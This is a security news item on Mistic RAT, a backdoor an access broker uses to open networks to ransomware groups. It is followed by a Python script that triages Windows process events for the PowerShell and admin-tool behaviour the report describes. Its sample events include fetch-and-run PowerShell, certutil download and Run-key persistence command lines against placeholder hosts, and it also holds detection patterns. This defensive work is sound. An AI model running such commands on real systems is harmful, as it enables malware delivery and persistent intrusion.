Mistic RAT Used as an Initial Access Tool, Increasing the Risk of Ransomware Attacks


345/69 Thursday, June 25, 2026

Security researchers have revealed that the Initial Access Broker (IAB) group tracked as Woodgnat, also known as KongTuke, is using a new Remote Access Trojan (RAT) called Mistic RAT to compromise organizations across multiple industries. The group has been linked to providing network access to several ransomware operations, including Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta, highlighting its role as a key facilitator in the ransomware ecosystem.

Mistic RAT provides the typical capabilities of a backdoor, including downloading and uploading files, managing files and directories, creating folders, and executing arbitrary code on compromised systems. It also allows attackers to adjust how frequently the malware checks in with its command-and-control (C2) server for new instructions and remotely terminate the malware when necessary. Researchers observed that Mistic RAT is commonly delivered as a DLL and executed using DLL sideloading, a technique designed to evade security detection by abusing legitimate applications.

According to the report, the threat group frequently leverages compromised WordPress websites and social engineering techniques to trick victims into executing attacker-controlled PowerShell commands through campaigns such as ClickFix, FileFix, and CrashFix. Since April 2026, the group has also begun impersonating IT helpdesk personnel through Microsoft Teams messages to lure users into running malicious commands. Organizations should closely monitor for suspicious PowerShell execution, unusual use of administrative tools such as Curl, Certutil, WMIC, Reg.exe, and Net.exe, and other behaviors that may indicate unauthorized access or an attempt to establish persistence before selling access to ransomware operators.
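As an added illustration of the monitoring the report recommends (this is not code from the article, SecurityWeek, or any vendor), the script below scores constructed Windows process-creation events for the cues named above: hidden-window, encoded or policy-bypassing PowerShell, PowerShell spawned by a browser or Teams (the ClickFix-style and helpdesk-impersonation lures), and use of Curl, Certutil, WMIC, Reg.exe and Net.exe, with download and Run-key persistence cues raising the weight. The field names are modelled on Sysmon Event ID 1 / Security 4688 as shipped in JSON, but every sample event, the weights, thresholds and the parent-process list are assumptions made for the example.

```python
"""Weighted triage of process-creation events for the IAB behaviours the
advisory describes. Added example; field layout (Image, ParentImage,
CommandLine, User) mirrors common JSON exports of Sysmon EID 1 / 4688.
All events, weights and thresholds below are constructed assumptions."""
import json
import re

# Administrative tools the advisory says to watch (image basenames, lower case)
WATCHED_TOOLS = {"curl.exe", "certutil.exe", "wmic.exe", "reg.exe", "net.exe", "net1.exe"}
# Script hosts: an admin tool launched from one of these is more suspicious than
# the same tool typed by an operator at a console (assumption)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Assumption: user-facing parents that should rarely spawn PowerShell; a browser,
# Teams or Explorer parent matches the paste-and-run lures the advisory describes
USER_FACING_PARENTS = {"explorer.exe", "msedge.exe", "chrome.exe", "firefox.exe",
                       "ms-teams.exe", "teams.exe", "outlook.exe", "winword.exe"}

# PowerShell switches that hide the window, bypass policy or pass an encoded command
EVASIVE_FLAGS = re.compile(
    r"(?i)-(?:e|ec|enc|encodedcommand|w\s+hidden|windowstyle\s+hidden"
    r"|ep\s+bypass|executionpolicy\s+bypass)\b")
# Cues that a command line fetches something from the network
DOWNLOAD_CUES = re.compile(
    r"(?i)(?:\biwr\b|invoke-webrequest|downloadstring|downloadfile|-urlcache|https?://)")
# Cues that a command line establishes persistence (Run key, scheduled task)
PERSISTENCE_CUES = re.compile(r"(?i)(?:currentversion\\run\b|schtasks(?:\.exe)?\s+/create)")

ALERT_THRESHOLD = 4  # assumption: tune to the environment's baseline


def basename(path):
    """Lower-cased image file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (verdict, score, reasons) for one parsed event dict."""
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    reasons = []  # (description, weight)
    if image in {"powershell.exe", "pwsh.exe"}:
        if EVASIVE_FLAGS.search(cmd):
            reasons.append(("evasive PowerShell flags", 2))
        if parent in USER_FACING_PARENTS:
            reasons.append((f"PowerShell spawned by {parent}", 2))
    if image in WATCHED_TOOLS:
        reasons.append((f"admin tool {image}", 1))
        if parent in SCRIPT_HOSTS:
            reasons.append((f"{image} launched from {parent}", 1))
    if DOWNLOAD_CUES.search(cmd):
        reasons.append(("download cue in command line", 2))
    if PERSISTENCE_CUES.search(cmd):
        reasons.append(("persistence cue in command line", 2))
    total = sum(w for _, w in reasons)
    verdict = "alert" if total >= ALERT_THRESHOLD else "review" if total else "ok"
    return verdict, total, [desc for desc, _ in reasons]


def triage(json_lines):
    """Score a sequence of JSON event lines; returns one summary dict per event."""
    out = []
    for line in json_lines:
        ev = json.loads(line)
        verdict, total, reasons = score_event(ev)
        out.append({"user": ev.get("User", "?"), "image": basename(ev.get("Image", "")),
                    "verdict": verdict, "score": total, "reasons": reasons})
    return out


# Constructed sample events (hosts under .invalid, fictitious users and paths)
SAMPLE_EVENTS = r'''
{"User": "CORP\\jdoe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe", "CommandLine": "powershell.exe -w hidden -ep bypass -c \"iwr http://example.invalid/stage.ps1 | iex\""}
{"User": "CORP\\jdoe", "Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "certutil.exe -urlcache -split -f http://example.invalid/update.dll C:\\Users\\Public\\update.dll"}
{"User": "CORP\\jdoe", "Image": "C:\\Windows\\System32\\reg.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /t REG_SZ /d C:\\Users\\Public\\update.exe"}
{"User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\\ProgramData\\Scripts\\inventory.ps1"}
{"User": "CORP\\asmith", "Image": "C:\\Windows\\System32\\net.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "net use Z: \\\\fs01.example.invalid\\share /persistent:yes"}
'''.strip().splitlines()

if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(f"{row['verdict']:6} score={row['score']} user={row['user']} "
              f"image={row['image']} reasons={row['reasons']}")
```

The scheduled inventory script (event 4) scores zero even though it runs PowerShell with an explicit execution policy, while the mapped drive (event 5) lands in "review" rather than "alert": the point of weighting is that the advisory's tool list is a trigger for context, not a verdict, and the parent process and command-line cues supply that context.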

Source: https://www.securityweek.com/new-mistic-rat-opens-door-to-several-ransomware-families/